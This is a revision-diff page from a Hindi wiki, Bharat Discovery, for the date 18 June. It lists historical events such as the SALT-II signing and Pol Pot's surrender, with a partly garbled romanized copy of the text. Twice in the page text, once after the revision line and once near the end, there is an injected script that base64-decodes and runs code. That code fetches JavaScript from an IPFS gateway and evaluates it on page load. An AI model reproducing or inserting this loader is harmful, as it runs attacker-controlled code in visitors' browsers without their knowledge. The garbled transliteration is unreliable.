Difference between revisions of "18 जून"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 5: Line 5:
 
==18 जून की महत्त्वपूर्ण घटनाएँ==
 
==18 जून की महत्त्वपूर्ण घटनाएँ==
 
* [[1979]] - अमेरिकी राष्ट्रपति जिम्मी कार्टर एवं सोवियत राष्ट्रपति ब्रेझनेव द्वारा 'साल्ट-द्वितीय' समझौते पर वियना में हस्ताक्षर।  
 
* [[1979]] - अमेरिकी राष्ट्रपति जिम्मी कार्टर एवं सोवियत राष्ट्रपति ब्रेझनेव द्वारा 'साल्ट-द्वितीय' समझौते पर वियना में हस्ताक्षर।  
 +
* [[1997]] - कंबोडिया के खमेर रूज के नेता और 20 लाख से ज़्यादा लोगों का हत्यारा माओवादी पोलपोट का आत्मसमर्पण।
 
* [[2008]]- केन्द्र सरकार ने [[गुर्जर|गुर्जरों]] को ओबीसी कोटे में 5% आरक्षण देने की घोषणा की। [[भारत]] यात्रा पर आये सीरिया के राष्ट्रपति बशहर अल असद और प्रधानमंत्री [[डॉ. मनमोहन सिंह]] के मध्य तीन समझोते पर हस्ताक्षर हुए। फ़ार्मा कम्पनी रैनबैक्सी ने अमेरिका फ़ार्मा कम्पनी फ़ाइजर के साथ पेटेंट विवाद को एक समझौते के तहत समाप्त किया।
 
* [[2008]]- केन्द्र सरकार ने [[गुर्जर|गुर्जरों]] को ओबीसी कोटे में 5% आरक्षण देने की घोषणा की। [[भारत]] यात्रा पर आये सीरिया के राष्ट्रपति बशहर अल असद और प्रधानमंत्री [[डॉ. मनमोहन सिंह]] के मध्य तीन समझोते पर हस्ताक्षर हुए। फ़ार्मा कम्पनी रैनबैक्सी ने अमेरिका फ़ार्मा कम्पनी फ़ाइजर के साथ पेटेंट विवाद को एक समझौते के तहत समाप्त किया।
 
==18 जून को जन्मे व्यक्ति==
 
==18 जून को जन्मे व्यक्ति==

Revision as of 06:47, 5 February 2012

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 18 joon varsh ka 169 vaan (lip varsh mean yah 170 vaan) din hai. sal mean abhi aur 196 din shesh haian.

18 joon ki mahattvapoorn ghatanaean

  • 1979 - ameriki rashtrapati jimmi kartar evan soviyat rashtrapati brejhanev dvara 'salt-dvitiy' samajhaute par viyana mean hastakshar.
  • 1997 - kanbodiya ke khamer rooj ke neta aur 20 lakh se zyada logoan ka hatyara maovadi polapot ka atmasamarpan.
  • 2008- kendr sarakar ne gurjaroan ko obisi kote mean 5% arakshan dene ki ghoshana ki. bharat yatra par aye siriya ke rashtrapati bashahar al asad aur pradhanamantri d aau. manamohan sianh ke madhy tin samajhote par hastakshar hue. farma kampani rainabaiksi ne amerika farma kampani faijar ke sath peteant vivad ko ek samajhaute ke tahat samapt kiya.

18 joon ko janme vyakti

18 joon ko hue nidhan

18 joon ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh